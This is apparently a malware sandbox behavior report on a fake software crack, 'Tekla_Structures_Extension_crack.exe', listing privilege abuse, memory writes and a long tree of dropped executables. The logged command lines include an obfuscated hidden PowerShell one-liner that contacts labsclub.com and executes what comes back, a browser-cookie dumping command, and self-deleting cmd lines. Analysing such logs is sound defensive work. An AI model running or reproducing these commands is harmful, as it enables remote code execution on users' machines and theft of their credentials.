HTTP User-Agent header	141	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	359	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	367	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	137	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1344	setups.tmp
1344	setups.tmp

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeDebugPrivilege	2060	Setup.exe
Token: SeCreateTokenPrivilege	1312	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	1312	askinstall20.exe
Token: SeLockMemoryPrivilege	1312	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	1312	askinstall20.exe
Token: SeMachineAccountPrivilege	1312	askinstall20.exe
Token: SeTcbPrivilege	1312	askinstall20.exe
Token: SeSecurityPrivilege	1312	askinstall20.exe
Token: SeTakeOwnershipPrivilege	1312	askinstall20.exe
Token: SeLoadDriverPrivilege	1312	askinstall20.exe
Token: SeSystemProfilePrivilege	1312	askinstall20.exe
Token: SeSystemtimePrivilege	1312	askinstall20.exe
Token: SeProfSingleProcessPrivilege	1312	askinstall20.exe
Token: SeIncBasePriorityPrivilege	1312	askinstall20.exe
Token: SeCreatePagefilePrivilege	1312	askinstall20.exe
Token: SeCreatePermanentPrivilege	1312	askinstall20.exe
Token: SeBackupPrivilege	1312	askinstall20.exe
Token: SeRestorePrivilege	1312	askinstall20.exe
Token: SeShutdownPrivilege	1312	askinstall20.exe
Token: SeDebugPrivilege	1312	askinstall20.exe
Token: SeAuditPrivilege	1312	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	1312	askinstall20.exe
Token: SeChangeNotifyPrivilege	1312	askinstall20.exe
Token: SeRemoteShutdownPrivilege	1312	askinstall20.exe
Token: SeUndockPrivilege	1312	askinstall20.exe
Token: SeSyncAgentPrivilege	1312	askinstall20.exe
Token: SeEnableDelegationPrivilege	1312	askinstall20.exe
Token: SeManageVolumePrivilege	1312	askinstall20.exe
Token: SeImpersonatePrivilege	1312	askinstall20.exe
Token: SeCreateGlobalPrivilege	1312	askinstall20.exe
Token: 31	1312	askinstall20.exe
Token: 32	1312	askinstall20.exe
Token: 33	1312	askinstall20.exe
Token: 34	1312	askinstall20.exe
Token: 35	1312	askinstall20.exe
Token: SeDebugPrivilege	2300	multitimer.exe
Token: SeDebugPrivilege	3900	taskkill.exe
Token: SeDebugPrivilege	3848	MicrosoftEdge.exe
Token: SeDebugPrivilege	3848	MicrosoftEdge.exe
Token: SeDebugPrivilege	3848	MicrosoftEdge.exe
Token: SeDebugPrivilege	3848	MicrosoftEdge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3680	setups.exe
1344	setups.tmp
3848	MicrosoftEdge.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 496 wrote to memory of 188	496	Tekla_Structures_Extension_crack.exe	78
PID 496 wrote to memory of 188	496	Tekla_Structures_Extension_crack.exe	78
PID 496 wrote to memory of 188	496	Tekla_Structures_Extension_crack.exe	78
PID 188 wrote to memory of 3912	188	cmd.exe	81
PID 188 wrote to memory of 3912	188	cmd.exe	81
PID 188 wrote to memory of 3912	188	cmd.exe	81
PID 188 wrote to memory of 1020	188	cmd.exe	82
PID 188 wrote to memory of 1020	188	cmd.exe	82
PID 188 wrote to memory of 1020	188	cmd.exe	82
PID 188 wrote to memory of 1568	188	cmd.exe	83
PID 188 wrote to memory of 1568	188	cmd.exe	83
PID 188 wrote to memory of 1568	188	cmd.exe	83
PID 188 wrote to memory of 3092	188	cmd.exe	84
PID 188 wrote to memory of 3092	188	cmd.exe	84
PID 188 wrote to memory of 3092	188	cmd.exe	84
PID 1568 wrote to memory of 2564	1568	keygen-step-3.exe	85
PID 1568 wrote to memory of 2564	1568	keygen-step-3.exe	85
PID 1568 wrote to memory of 2564	1568	keygen-step-3.exe	85
PID 3092 wrote to memory of 2060	3092	keygen-step-4.exe	87
PID 3092 wrote to memory of 2060	3092	keygen-step-4.exe	87
PID 3912 wrote to memory of 3824	3912	keygen-pr.exe	88
PID 3912 wrote to memory of 3824	3912	keygen-pr.exe	88
PID 3912 wrote to memory of 3824	3912	keygen-pr.exe	88
PID 2564 wrote to memory of 3168	2564	cmd.exe	89
PID 2564 wrote to memory of 3168	2564	cmd.exe	89
PID 2564 wrote to memory of 3168	2564	cmd.exe	89
PID 3824 wrote to memory of 2160	3824	key.exe	90
PID 3824 wrote to memory of 2160	3824	key.exe	90
PID 3824 wrote to memory of 2160	3824	key.exe	90
PID 2060 wrote to memory of 2300	2060	Setup.exe	91
PID 2060 wrote to memory of 2300	2060	Setup.exe	91
PID 2060 wrote to memory of 3680	2060	Setup.exe	92
PID 2060 wrote to memory of 3680	2060	Setup.exe	92
PID 2060 wrote to memory of 3680	2060	Setup.exe	92
PID 3092 wrote to memory of 1312	3092	keygen-step-4.exe	93
PID 3092 wrote to memory of 1312	3092	keygen-step-4.exe	93
PID 3092 wrote to memory of 1312	3092	keygen-step-4.exe	93
PID 3680 wrote to memory of 1344	3680	setups.exe	94
PID 3680 wrote to memory of 1344	3680	setups.exe	94
PID 3680 wrote to memory of 1344	3680	setups.exe	94
PID 1312 wrote to memory of 3632	1312	askinstall20.exe	96
PID 1312 wrote to memory of 3632	1312	askinstall20.exe	96
PID 1312 wrote to memory of 3632	1312	askinstall20.exe	96
PID 3632 wrote to memory of 3900	3632	cmd.exe	98
PID 3632 wrote to memory of 3900	3632	cmd.exe	98
PID 3632 wrote to memory of 3900	3632	cmd.exe	98

C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_Extension_crack.exe
"C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_Extension_crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:188
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3912
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3824
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:2160
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1020
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1568
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2564
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:3168
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3092
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2060
    - - C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2300
      - C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe" 1 3.1617436106.60681dcaa984e 101
        6⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RPJZWYTEA9\multitimer.exe" 2 3.1617436106.60681dcaa984e
        7⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\3iqxfs0bguf\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3iqxfs0bguf\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        10⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        10⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        11⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\kjkmcr12kce\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kjkmcr12kce\app.exe" /8-23
        8⤵
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\clr0fwazyvn\3o341pxwfce.exe
        
        "C:\Users\Admin\AppData\Local\Temp\clr0fwazyvn\3o341pxwfce.exe" /VERYSILENT
        8⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\is-00FP1.tmp\3o341pxwfce.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-00FP1.tmp\3o341pxwfce.tmp" /SL5="$50030,2592217,780800,C:\Users\Admin\AppData\Local\Temp\clr0fwazyvn\3o341pxwfce.exe" /VERYSILENT
        9⤵
        
        PID:2480
        
        C:\Users\Admin\AppData\Local\Temp\is-BG1V8.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-BG1V8.tmp\winlthsth.exe"
        10⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\c0doImdyA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c0doImdyA.exe"
        11⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\c0doImdyA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c0doImdyA.exe"
        12⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:7012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\xhbf55lg2jr\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xhbf55lg2jr\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\is-KG9C2.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KG9C2.tmp\Setup3310.tmp" /SL5="$20304,138429,56832,C:\Users\Admin\AppData\Local\Temp\xhbf55lg2jr\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\is-99C1H.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-99C1H.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:4760
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:2200
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:644
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 928
        12⤵
        Program crash
        
        PID:9100
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 1004
        12⤵
        Program crash
        
        PID:7940
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 1012
        12⤵
        Program crash
        
        PID:6280
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:3388
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\is-27V6C.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-27V6C.tmp\LabPicV3.tmp" /SL5="$30416,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\is-AHSGS.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-AHSGS.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:4652
        
        C:\Program Files\javcse\PNCLQDNZYH\prolab.exe
        
        "C:\Program Files\javcse\PNCLQDNZYH\prolab.exe" /VERYSILENT
        14⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\is-7MTK1.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7MTK1.tmp\prolab.tmp" /SL5="$702E8,575243,216576,C:\Program Files\javcse\PNCLQDNZYH\prolab.exe" /VERYSILENT
        15⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\c6-7cc36-486-08a96-2484d88bcf3fb\Lekukewiso.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c6-7cc36-486-08a96-2484d88bcf3fb\Lekukewiso.exe"
        14⤵
        
        PID:4580
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ggkpaxg.yge\md6_6ydj.exe & exit
        15⤵
        
        PID:8688
        
        C:\Users\Admin\AppData\Local\Temp\4ggkpaxg.yge\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\4ggkpaxg.yge\md6_6ydj.exe
        16⤵
        
        PID:8356
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s0iozbvw.bi2\askinstall31.exe & exit
        15⤵
        
        PID:9020
        
        C:\Users\Admin\AppData\Local\Temp\s0iozbvw.bi2\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\s0iozbvw.bi2\askinstall31.exe
        16⤵
        
        PID:9032
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exe & exit
        15⤵
        
        PID:8400
        
        C:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exe
        16⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\1ret2vrb.xu4\toolspab1.exe
        17⤵
        
        PID:6900
        
        C:\Users\Admin\AppData\Local\Temp\3a-db3e5-aa2-ae1a4-8e48ea7fb7fdd\Cyhymaezhoqae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3a-db3e5-aa2-ae1a4-8e48ea7fb7fdd\Cyhymaezhoqae.exe"
        14⤵
        
        PID:936
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1948
        15⤵
        
        PID:9208
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\is-DBBP7.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DBBP7.tmp\lylal220.tmp" /SL5="$303E8,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        12⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\is-RBKD2.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-RBKD2.tmp\Microsoft.exe" /S /UID=lylal220
        13⤵
        
        PID:5288
        
        C:\Program Files\Windows Photo Viewer\QBLORUZYKE\irecord.exe
        
        "C:\Program Files\Windows Photo Viewer\QBLORUZYKE\irecord.exe" /VERYSILENT
        14⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\is-UA4PC.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UA4PC.tmp\irecord.tmp" /SL5="$302C0,6265333,408064,C:\Program Files\Windows Photo Viewer\QBLORUZYKE\irecord.exe" /VERYSILENT
        15⤵
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\d8-ba074-a6e-b38bc-15d93552faa6f\Banadisixae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d8-ba074-a6e-b38bc-15d93552faa6f\Banadisixae.exe"
        14⤵
        
        PID:4664
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bxg2d3bf.ozq\md6_6ydj.exe & exit
        15⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\bxg2d3bf.ozq\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\bxg2d3bf.ozq\md6_6ydj.exe
        16⤵
        
        PID:9072
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qmwy1en0.hkr\askinstall31.exe & exit
        15⤵
        
        PID:8900
        
        C:\Users\Admin\AppData\Local\Temp\qmwy1en0.hkr\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\qmwy1en0.hkr\askinstall31.exe
        16⤵
        
        PID:8924
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:8072
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:1688
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exe & exit
        15⤵
        
        PID:9152
        
        C:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exe
        16⤵
        
        PID:752
        
        C:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\qiisvnyx.z1h\toolspab1.exe
        17⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\c0-8fb56-11b-6378f-ba6526c6639bb\ZHowamyvabo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c0-8fb56-11b-6378f-ba6526c6639bb\ZHowamyvabo.exe"
        14⤵
        
        PID:6116
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 968
        15⤵
        
        PID:6532
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:4268
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:1480
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:5452
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:5432
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:3768
        
        C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe" 1 3.1617436250.60681e5ae6948 103
        13⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2GJR7HJ7SL\multitimer.exe" 2 3.1617436250.60681e5ae6948
        14⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\zamhgido4kr\oyupdfk10hn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zamhgido4kr\oyupdfk10hn.exe" /ustwo INSTALL
        15⤵
        
        PID:8684
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "oyupdfk10hn.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zamhgido4kr\oyupdfk10hn.exe" & exit
        16⤵
        
        PID:9140
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "oyupdfk10hn.exe" /f
        17⤵
        Kills process with taskkill
        
        PID:6848
        
        C:\Users\Admin\AppData\Local\Temp\alijcwo4i1d\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\alijcwo4i1d\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\is-RUC0P.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RUC0P.tmp\vict.tmp" /SL5="$C0054,870426,780800,C:\Users\Admin\AppData\Local\Temp\alijcwo4i1d\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\is-ROGL2.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-ROGL2.tmp\win1host.exe" 535
        17⤵
        
        PID:8580
        
        C:\Users\Admin\AppData\Local\Temp\vs2in00lovw\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vs2in00lovw\app.exe" /8-23
        15⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\n3jiyolpoxz\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\n3jiyolpoxz\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\is-B26OF.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B26OF.tmp\Setup3310.tmp" /SL5="$4028E,138429,56832,C:\Users\Admin\AppData\Local\Temp\n3jiyolpoxz\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\is-KBRJ9.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KBRJ9.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:8128
        
        C:\Users\Admin\AppData\Local\Temp\4wozkkct4ft\KiffApp1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4wozkkct4ft\KiffApp1.exe"
        15⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\Temp\obs1jaaoyqe\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\obs1jaaoyqe\vpn.exe" /silent /subid=482
        15⤵
        
        PID:6608
        
        C:\Users\Admin\AppData\Local\Temp\is-JR34P.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JR34P.tmp\vpn.tmp" /SL5="$402C6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\obs1jaaoyqe\vpn.exe" /silent /subid=482
        16⤵
        
        PID:6860
        
        C:\Users\Admin\AppData\Local\Temp\w3djgd3qfrq\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\w3djgd3qfrq\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:7532
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        17⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:7776
        
        C:\Users\Admin\AppData\Local\Temp\9YTD6B9BRY\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9YTD6B9BRY\setups.exe" ll
        12⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\is-LBGT6.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LBGT6.tmp\setups.tmp" /SL5="$401D0,635399,250368,C:\Users\Admin\AppData\Local\Temp\9YTD6B9BRY\setups.exe" ll
        13⤵
        
        PID:5836
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"
        11⤵
        
        PID:5152
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\wt43veflb3u\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wt43veflb3u\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\is-0BHE5.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0BHE5.tmp\vict.tmp" /SL5="$1036C,870426,780800,C:\Users\Admin\AppData\Local\Temp\wt43veflb3u\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:5156
        
